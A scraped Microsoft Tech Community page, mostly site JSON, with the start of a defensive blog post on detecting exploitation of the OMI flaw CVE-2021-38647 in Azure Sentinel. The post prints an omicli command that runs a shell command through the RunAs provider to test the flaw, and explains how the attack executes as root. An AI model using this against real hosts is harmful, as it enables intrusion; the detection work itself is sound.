38\n\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"VerifyUserEmailPage\",\"type\":\"USER\",\"urlPath\":\"/verifyemail/:userId/:verifyEmailToken\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageR\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"AllOccasionsPage\",\"type\":\"OCCASION\",\"urlPath\":\"/category/:categoryId/events/:boardId/all-events/(/:after|/:before)?\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"EventBoardPage\",\"type\":\"EVENT\",\"urlPath\":\"/category/:categoryId/events/:boardId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResou\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TkbReplyPage\",\"type\":\"TKB_REPLY\",\"urlPath\":\"/kb/:boardId/:messageSubject/:messageId/comments/:replyId\",\"__typename\":\"PageDescriptor\"}\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"IdeaBoardPage\",\"type\":\"IDEA\",\"urlPath\":\"/category/:categoryId/ideas/:boardId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CommunityGuideLinesPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/communityguidelines\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageR\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CaseCreatePage\",\"type\":\"SALESFORCE_CASE_CREATION\",\"urlPath\":\"/caseportal/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"Pa\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TkbEditPage\",\"type\":\"TKB\",\"urlPath\":\"/kb/:boardId/:messageSubject/:messageId/edit\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageRes\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ForgotPasswordPage\",\"type\":\"USER\",\"urlPath\":\"/forgotpassword\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"IdeaEditPage\",\"type\":\"IDEA\",\"urlPath\":\"/idea/:boardId/:messageSubject/:messageId/edit\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageR\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TagPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/tag/:tagName\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"BlogBoardPage\",\"type\":\"BLOG\",\"urlPath\":\"/category/:categoryId/blog/:boardId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"OccasionMessagePage\",\"type\":\"OCCASION_TOPIC\",\"urlPath\":\"/event/:boardId/:messageSubject/:messageId\",\"__typename\":\"PageDescriptor\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ManageContentPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/managecontent\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ClosedMembershipNodeNonMembersPage\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/closedgroup/:groupHubId\",\"__typename\":\"PageDescriptor\"},\"__t\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CommunityPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ForumMessagePage\",\"type\":\"FORUM_TOPIC\",\"urlPath\":\"/discussions/:boardId/:messageSubject/:messageId\",\"__typename\":\"PageDescriptor\"},\"\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"IdeaPostPage\",\"type\":\"IDEA\",\"urlPath\":\"/category/:categoryId/ideas/:boardId/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResou\r\n{\"lastUpdatedTime\":1730819800000,\"localOverride\":null,\"page\":\r\n{\"id\":\"CommunityHub.Page\",\"type\":\"CUSTOM\",\"urlPath\":\"/Directory\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"BlogMessagePage\",\"type\":\"BLOG_ARTICLE\",\"urlPath\":\"/blog/:boardId/:messageSubject/:messageId\",\"__typename\":\"PageDescriptor\"},\"__typen\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"RegistrationPage\",\"type\":\"USER\",\"urlPath\":\"/register\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"EditGroupHubPage\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/group/:groupHubId/edit\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ForumEditPage\",\"type\":\"FORUM\",\"urlPath\":\"/discussions/:boardId/:messageSubject/:messageId/edit\",\"__typename\":\"PageDescriptor\"},\"__typena\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ResetPasswordPage\",\"type\":\"USER\",\"urlPath\":\"/resetpassword/:userId/:resetPasswordToken\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"Pa\r\n{\"lastUpdatedTime\":1730819800000,\"localOverride\":null,\"page\":\r\n{\"id\":\"AllBlogs.Page\",\"type\":\"CUSTOM\",\"urlPath\":\"/blogs\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TkbMessagePage\",\"type\":\"TKB_ARTICLE\",\"urlPath\":\"/kb/:boardId/:messageSubject/:messageId\",\"__typename\":\"PageDescriptor\"},\"__typename\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"BlogEditPage\",\"type\":\"BLOG\",\"urlPath\":\"/blog/:boardId/:messageSubject/:messageId/edit\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"Page\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ManageUsersPage\",\"type\":\"USER\",\"urlPath\":\"/users/manage/:tab?/:manageUsersTab?\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageRes\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ForumReplyPage\",\"type\":\"FORUM_REPLY\",\"urlPath\":\"/discussions/:boardId/:messageSubject/:messageId/replies/:replyId\",\"__typename\":\"PageD\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"PrivacyPolicyPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/privacypolicy\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"NotificationPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/notifications\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 7 of 38\n\n{\"id\":\"UserPage\",\"type\":\"USER\",\"urlPath\":\"/users/:login/:userId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"HealthCheckPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/health\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"OccasionReplyPage\",\"type\":\"OCCASION_REPLY\",\"urlPath\":\"/event/:boardId/:messageSubject/:messageId/comments/:replyId\",\"__typename\":\"P\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ManageMembersPage\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/group/:groupHubId/manage/:tab?\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"P\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"SearchResultsPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/search\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"BlogReplyPage\",\"type\":\"BLOG_REPLY\",\"urlPath\":\"/blog/:boardId/:messageSubject/:messageId/replies/:replyId\",\"__typename\":\"PageDescriptor\"\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"GroupHubPage\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/group/:groupHubId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TermsOfServicePage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/termsofservice\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CategoryPage\",\"type\":\"CATEGORY\",\"urlPath\":\"/category/:categoryId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ForumViewAllTopicsPage\",\"type\":\"FORUM\",\"urlPath\":\"/category/:categoryId/discussions/:boardId/all-topics/(/:after|/:before)?\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TkbPostPage\",\"type\":\"TKB\",\"urlPath\":\"/category/:categoryId/kbs/:boardId/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"GroupHubPostPage\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/group/:groupHubId/:boardId/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"Pa\r\ncomponents/context/AppContext/AppContextProvider-0\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/context/AppContext/AppContextProvider-0\",\"value\":{\"noCommunity\":\"Cannot find\r\ncommunity\",\"noUser\":\"Cannot find current user\",\"noNode\":\"Cannot find node with id {nodeId}\",\"noMessage\":\"Cannot\r\nfind message with id {messageId}\",\"userBanned\":\"We're sorry, but you have been banned from using this\r\nsite.\",\"userBannedReason\":\"You have been banned for the following reason:\r\n{reason}\"},\"localOverride\":false},\"CachedAsset:text:en_US-shared/client/components/common/Loading/LoadingDot-0\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-shared/client/components/common/Loading/LoadingDot-0\",\"value\":\r\n{\"title\":\"Loading...\"},\"localOverride\":false},\"Rank:rank:25\":\r\n{\"__typename\":\"Rank\",\"id\":\"rank:25\",\"position\":3,\"name\":\"Former\r\nEmployee\",\"color\":\"333333\",\"icon\":null,\"rankStyle\":\"TEXT\"},\"User:user:528639\":\r\n{\"__typename\":\"User\",\"id\":\"user:528639\",\"uid\":528639,\"login\":\"russmc\",\"deleted\":false,\"avatar\":\r\n{\"__typename\":\"UserAvatar\",\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/dS01Mjg2MzktMzExMzE4aTYwOUREQzZGMUIwQ\r\n{\"__ref\":\"Rank:rank:25\"},\"email\":\"\",\"messagesCount\":4,\"biography\":null,\"topicsCount\":2,\"kudosReceivedCount\":10,\"kudosGivenCount\":0,\"kudosWeig\r\n{\"__typename\":\"RegistrationData\",\"status\":null,\"registrationTime\":\"2020-01-22T08:05:18.887-\r\n08:00\",\"confirmEmailStatus\":null},\"followersCount\":null,\"solutionsCount\":0},\"Category:category:microsoft-sentinel\":\r\n{\"__typename\":\"Category\",\"id\":\"category:microsoft-sentinel\",\"entityType\":\"CATEGORY\",\"displayId\":\"microsoft-sentinel\",\"nodeType\":\"category\",\"depth\":4,\"title\":\"Microsoft Sentinel\",\"shortTitle\":\"Microsoft Sentinel\",\"parent\":\r\n{\"__ref\":\"Category:category:microsoft-security\"}},\"Category:category:top\":\r\n{\"__typename\":\"Category\",\"id\":\"category:top\",\"entityType\":\"CATEGORY\",\"displayId\":\"top\",\"nodeType\":\"category\",\"depth\":0,\"title\":\"Top\",\"shortTitle\"\r\n{\"__typename\":\"Category\",\"id\":\"category:communities\",\"entityType\":\"CATEGORY\",\"displayId\":\"communities\",\"nodeType\":\"category\",\"depth\":1,\"paren\r\n{\"__ref\":\"Category:category:top\"},\"title\":\"Communities\",\"shortTitle\":\"Communities\"},\"Category:category:products-services\":{\"__typename\":\"Category\",\"id\":\"category:products-services\",\"entityType\":\"CATEGORY\",\"displayId\":\"products-services\",\"nodeType\":\"category\",\"depth\":2,\"parent\":\r\n{\"__ref\":\"Category:category:communities\"},\"title\":\"Products\",\"shortTitle\":\"Products\"},\"Category:category:microsoft-security\":{\"__typename\":\"Category\",\"id\":\"category:microsoft-security\",\"entityType\":\"CATEGORY\",\"displayId\":\"microsoft-security\",\"nodeType\":\"category\",\"depth\":3,\"parent\":\r\n{\"__ref\":\"Category:category:products-services\"},\"title\":\"Microsoft Security\",\"shortTitle\":\"Microsoft\r\nSecurity\",\"categoryPolicies\":{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Blog:board:MicrosoftSentinelBlog\":\r\n{\"__typename\":\"Blog\",\"id\":\"board:MicrosoftSentinelBlog\",\"entityType\":\"BLOG\",\"displayId\":\"MicrosoftSentinelBlog\",\"nodeType\":\"board\",\"depth\":5,\"c\r\n{\"__typename\":\"RepliesProperties\",\"sortOrder\":\"REVERSE_PUBLISH_TIME\",\"repliesFormat\":\"threaded\"},\"tagProperties\":\r\n{\"__typename\":\"TagNodeProperties\",\"tagsEnabled\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}},\"requireTags\":false,\"tagType\":\"PRESET_ONLY\",\"description\":\"\r\nMicrosoft Sentinel is an industry-leading SIEM \u0026 AI-first platform powering agentic defense across the entire security\r\necosystem.\r\n\",\"title\":\"Microsoft Sentinel Blog\",\"shortTitle\":\"Microsoft Sentinel Blog\",\"parent\":{\"__ref\":\"Category:category:microsoft-sentinel\"},\"ancestors\":{\"__typename\":\"CoreNodeConnection\",\"edges\":[{\"__typename\":\"CoreNodeEdge\",\"node\":\r\n{\"__ref\":\"Community:community:gxcuf89792\"}},{\"__typename\":\"CoreNodeEdge\",\"node\":\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 8 of 38\n\n{\"__ref\":\"Category:category:communities\"}},{\"__typename\":\"CoreNodeEdge\",\"node\":\r\n{\"__ref\":\"Category:category:products-services\"}},{\"__typename\":\"CoreNodeEdge\",\"node\":\r\n{\"__ref\":\"Category:category:microsoft-security\"}},{\"__typename\":\"CoreNodeEdge\",\"node\":\r\n{\"__ref\":\"Category:category:microsoft-sentinel\"}}]},\"userContext\":\r\n{\"__typename\":\"NodeUserContext\",\"canAddAttachments\":false,\"canUpdateNode\":false,\"canPostMessages\":false,\"isSubscribed\":false},\"theme\":\r\n{\"__ref\":\"Theme:customTheme1\"},\"boardPolicies\":{\"__typename\":\"BoardPolicies\",\"canViewSpamDashBoard\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.feature.moderation_spam.action.access_spam_quarantine.allowed.accessDenied\",\"key\"\r\n[]}},\"canArchiveMessage\":{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.content_archivals.enable_content_archival_settings.accessDenied\",\"key\":\"error.lithium\r\n[]}},\"canPublishArticleOnCreate\":{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.forums.policy_can_publish_on_create_workflow_action.accessDenied\",\"key\":\"error.lit\r\n[]}}},\"linkProperties\":\r\n{\"__typename\":\"LinkProperties\",\"isExternalLinkWarningEnabled\":false}},\"BlogTopicMessage:message:2764093\":\r\n{\"__typename\":\"BlogTopicMessage\",\"uid\":2764093,\"subject\":\"Hunting for OMI Vulnerability Exploitation with Azure\r\nSentinel\",\"id\":\"message:2764093\",\"entityType\":\"BLOG_ARTICLE\",\"eventPath\":\"category:microsoft-sentinel/category:microsoft-security/category:products-services/category:communities/community:gxcuf89792board:MicrosoftSentinelBlog/message:2764093\",\"revisionNum\":25,\"repliesCount\":3,\"author\":\r\n{\"__ref\":\"User:user:528639\"},\"depth\":0,\"hasGivenKudo\":false,\"board\":\r\n{\"__ref\":\"Blog:board:MicrosoftSentinelBlog\"},\"conversation\":\r\n{\"__ref\":\"Conversation:conversation:2764093\"},\"messagePolicies\":\r\n{\"__typename\":\"MessagePolicies\",\"canPublishArticleOnEdit\":{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.forums.policy_can_publish_on_edit_workflow_action.accessDenied\",\"key\":\"error.lithi\r\n[]}},\"canModerateSpamMessage\":{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.feature.moderation_spam.action.moderate_entity.allowed.accessDenied\",\"key\":\"error.li\r\n[]}},\"canReply\":{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.forums.action.message.reply_to_entity.allow.accessDenied\",\"key\":\"error.lithium.polici\r\n[]}},\"canAcceptSolution\":{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.accepted_solutions.action_allow.message.mark_as_accepted_solution.accessDenied\",\"k\r\n[]}},\"canRejectSolution\":{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.accepted_solutions.action_allow.message.unmark_as_accepted_solution.accessDenied\"\r\n[]}},\"canTag\":{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.labels.action.labelableentity.set_labels.allow.accessDenied\",\"key\":\"error.lithium.policie\r\n[]}},\"canEdit\":{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.forums.action_allow.edit_message.accessDenied\",\"key\":\"error.lithium.policies.forums.\r\n[]}},\"canKudo\":{\"__typename\":\"PolicyResult\",\"failureReason\":\r\n{\"__typename\":\"FailureReason\",\"message\":\"error.lithium.policies.kudos.action.entity.give_kudos.allow.accessDenied\",\"key\":\"error.lithium.policies.kudo\r\n[]}}},\"contentWorkflow\":\r\n{\"__typename\":\"ContentWorkflow\",\"state\":\"PUBLISH\",\"scheduledPublishTime\":null,\"scheduledTimezone\":null,\"userContext\":\r\n{\"__typename\":\"MessageWorkflowContext\",\"canSubmitForReview\":null,\"canEdit\":false,\"canRecall\":null,\"canSubmitForPublication\":null,\"canReturnTo\r\n{\"__ref\":\"ModerationData:moderation_data:2764093\"},\"teaser\":\"\\n\\n\r\nMicrosoft Threat Intelligence Center (MSTIC) have been monitoring for signs of exploitation of the OMI vulnerability and\r\ninvestigating detections to further protect customers.\r\n\",\"body\":\"\r\nRussell McDonald, Roberto Rodriguez, and Ajeet Prakash\r\n\\n\r\nSpecial thanks to: Ross Bevington \r\n\\n\\n\r\nFollowing the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2021-38647)\r\nin the Open Management Infrastructure (OMI) Framework, analysts in the Microsoft Threat Intelligence Center (MSTIC)\r\nhave been monitoring for signs of exploitation and investigating detections to further protect customers. Following the\r\nMSRC guidance to block ports that you aren't using and to ensure the OMI service is patched are great first steps. In this\r\nblog, we have some things to share about current attacks in the wild, agents and software involved, indicators for defenders\r\nto look for on host machines, and to share new detections in Azure Sentinel.\r\n\\n\\n\\n\r\nAt Microsoft we monitor for attacks against our cloud services to inform our future security research, track emerging threats,\r\nand to improve the detection coverage of our security offerings.  As part of that work, MSTIC is monitoring for exploitation\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 9 of 38\n\nof the OMI related RCE (CVE-2021-38647).  To date we have seen several active exploitation attempts ranging from basic\r\nhost enumeration (running uname, id, ps commands) to attempts to install a crypto currency miner or file share. (Details\r\navailable below in Hunting cues section). We have also seen others in the community report similar behavior to include\r\ninstalls of the Mirai botnet. While many of the attackers are looking for port 5986, we are also seeing attacks on port 1270. \r\nDue to the number of easily adaptable proof of concept exploits available and the volume of reconnaissance-type attacks, we\r\nare anticipating an increase in the number of effects-type attacks (coin miners, bot installation, etc.).\r\n\\n\\n\\n\r\nOMI is an open-source project to further the development of a production quality implementation of the OMI CIMOM is\r\nalso designed to be portable and highly modular. In order to attain its small footprint, it is coded in C, which also makes it a\r\nmuch more viable CIM Object Manager for embedded systems and other infrastructure components that have memory\r\nconstraints for their management processor. OMI is also designed to be inherently portable. It builds and runs today on most\r\nUNIX® systems and Linux. In addition to OMI's small footprint, it also demonstrates very high performance.\r\n\\n\\n\\n\r\nIn a nutshell, anyone with access to an endpoint running a vulnerable version (less than 1.6.8.1) of the OMI agent can\r\nexecute arbitrary commands over an HTTP request without an authorization header. The expected behavior would be a 401\r\nunauthorized response. However, the user is able to execute commands with root privileges.\r\n\\n\r\nMore details are available in the MSRC CVE-2021-38647 post and the finder company Wiz blog post.\r\n\\n\\n\\n\r\nIn addition to monitoring for incoming connections over ports 5986, 5985 or 1270 to vulnerable systems, there is more to\r\nexplore at the endpoint level.\r\n\\n\\n\\n\r\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\r\nMicrosoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.\r\n\\n\r\nThe SCXcore provides a CIMOM provider, based on OMI, to return logging and statistical information for a UNIX or Linux\r\nsystem. There are several providers or classes available through the SCXcore provider which can be used to gather\r\ninformation from an endpoint such as  MemoryStatisticalInformation or FileSystemStatisticalInformation.\r\n\\n\\n\r\nIn addition, there is one support provider named the RunAsProvider which provides the following classes:\r\n\\n\r\n\\n\r\nExecuteCommand: Executes any UNIX/Linux native command\r\n\\n\r\nExecuteShellCommand: Executes any UNIX/Linux command using the /bin/sh shell\r\n\\n\r\nExecuteScript: Executes any UNIX/Linux script using the /bin/sh shell\r\n\\n\r\n\\n\\n\\n\r\nBased on the initial research from Wiz, the following command was used to explore network traffic in order to craft an\r\nHTTP request to test the vulnerability:\r\n\\n\\n\\n\\n\\n\\n\\n\r\n/opt/omi/bin/omicli --hostname 192.168.1.1 -u azureuser -p Password1 iv root/scx { SCX_OperatingSystem }\r\nExecuteShellCommand { command 'id' timeout 0 }\r\n\\n\\n\r\nDuring testing, we used the Scxadmin tool, available as part of SCX, to increase all logging to VERBOSE and identify\r\nadditional sources of data. The following command was used:\r\n\\n\\n\\n\\n\\n\\n\\n\r\n/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 10 of 38\n\n\\n\\n\r\nAfter running public proof-of-concepts to test the vulnerability, we validated that the code was being handled by the\r\nRunAsProvider :: Invoke_ExecuteShellCommand class:\r\n\\n\r\nChecking logs from auditd via Syslog, we also identified where the code was being executed from:\r\n\\n\\n\r\nWe tested the same in our lab environments, and we observed the same behavior which is shown below:\r\n\\n\\n\\n\r\nLooking at the code behind the components of the RunAs providers, there are some references to it:\r\n\\n\\n\\n\r\nMore information about SCXcore is available here: GitHub - microsoft/SCXcore: System Center Cross Platform Provider\r\nfor Operations Manager\r\n\\n\\n\\n\\n\r\nSimilarly, scripts can be run using the ExecuteScript provider. In this case, the body of the http request contains a reference\r\nto ExecuteScript.  In the below example, the command ‘id’ is base64 encoded to ‘aWQ=’:\r\n\\n\\n\\n\r\nIn this case, the script is passed into a temp directory which you can see in the execve logs. Look for a commandline similar\r\nto /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx*. This command will still show as being run from the same\r\n/var/opt/microsoft/scx/tmp current working directory.\r\n\\n\r\nOf note, this is the method we have seen used with attackers attempting to install coin miners.\r\n\\n\\n\r\nAzure Sentinel coverage\r\n\\n\r\nRelevant security data required for understanding the impact of an attack is produced in multiple locations. Azure Sentinel\r\nhas made it easy to collect the data from multiple data sources easily. This section of the post contains guidance and generic\r\napproaches to look for the OMI related activity in various data feeds that are available by default in Azure Sentinel or can be\r\nonboarded to Azure Sentinel.\r\n\\n\\n\r\nSome Azure products, such as Configuration Management, open an HTTP/S port (1270/5985/5986) listening for OMI.\r\nAttackers can exploit the vulnerability in OMI where these ports are open by sending a specially crafted message via\r\nHTTPS to port listening to OMI to gain initial access to the machine.\r\n\\n\\n\r\nThe Azure Sentinel query linked below tries to identify connection attempts from the external IP addresses to the OMI\r\nmanagement ports (5985,5986,1270). The query primarily leverages the Network Session normalization schema\r\n(imNetworkSession)  as well as a few other logs to look for this network connection activity from an external IP address.\r\nWhere available, it tries to restrict the results to the relevant OMI process. The results can sometimes be noisy; hence the\r\nquery has been shipped as a hunting query.\r\n\\n\r\nNormalizing parsers for leveraging the imNetworkSession normalized schema are required for this query to work and can be\r\ndeployed in a click using an ARM Template.\r\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\r\nCustomers can also use Heartbeat logs that monitors agent health to find vulnerable machine. The Azure Sentinel query\r\nlinked below tries to leverage Heartbeat data to find OMS-agents that are reporting to the Azure Sentinel workspace but are\r\nnot updated to the latest version that prevents this vulnerability.\r\n\\n\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 11 of 38\n\n[updated Sept 27, 2021]\r\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\r\nAdditionally, Azure Security Center generates detailed security recommendations if there are vulnerable machines in an\r\nAzure Environment with OMI installed. With the continuous export feature of Security Center, these security\r\nrecommendations can be imported into Azure Sentinel. Azure Sentinel leverages this data populated in Security Nested\r\nRecommendations table to build a detection query to show vulnerable machines.\r\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\r\nAzure Service Health has also sent notifications to potentially impacted customers. In the impacted environments where\r\ncustomers can run a quick query to check if they are impacted by this Vulnerability.\r\n\\n\\n\\n\\n\\n\\n\\n\r\n\\n\r\nAzureActivity\r\n| where CategoryValue == 'ServiceHealth'\r\n| where isnotempty(Properties) and Properties has 'CVE-2021-38645'\r\n| extend defaultLanguageTitle =\r\ntostring(parse_json(tostring(parse_json(Properties).eventProperties)).defaultLanguageTitle)\r\n\\n\r\n\\n\\n\\n\r\n[updated Sept 24, 2021]\r\n\\n\r\nThe below hunting query uses security events from the Microsoft Audit Collection Tool (AUOMS) collected via the Azure\r\nSentinel Syslog data connector to explore the use of SCX Execute RunAs providers.\r\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\r\nExecute RunAs providers such as the ExecuteShellCommand and ExecuteScript can be used to execute any UNIX/Linux\r\ncommand and script respectively using the /bin/sh shell. Execution occurs from the /var/opt/microsoft/scx/tmp directory and\r\ndepending on the execution RunAs provider, execution can be a command or a script. If the ExecuteScript RunAs provider\r\nis used, then the script file is created in the following directory /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/ with the prefix scx\r\n(e.g. scxzOy96). SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of\r\nproducts including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.\r\n\\n\\n\r\nHunting cues and 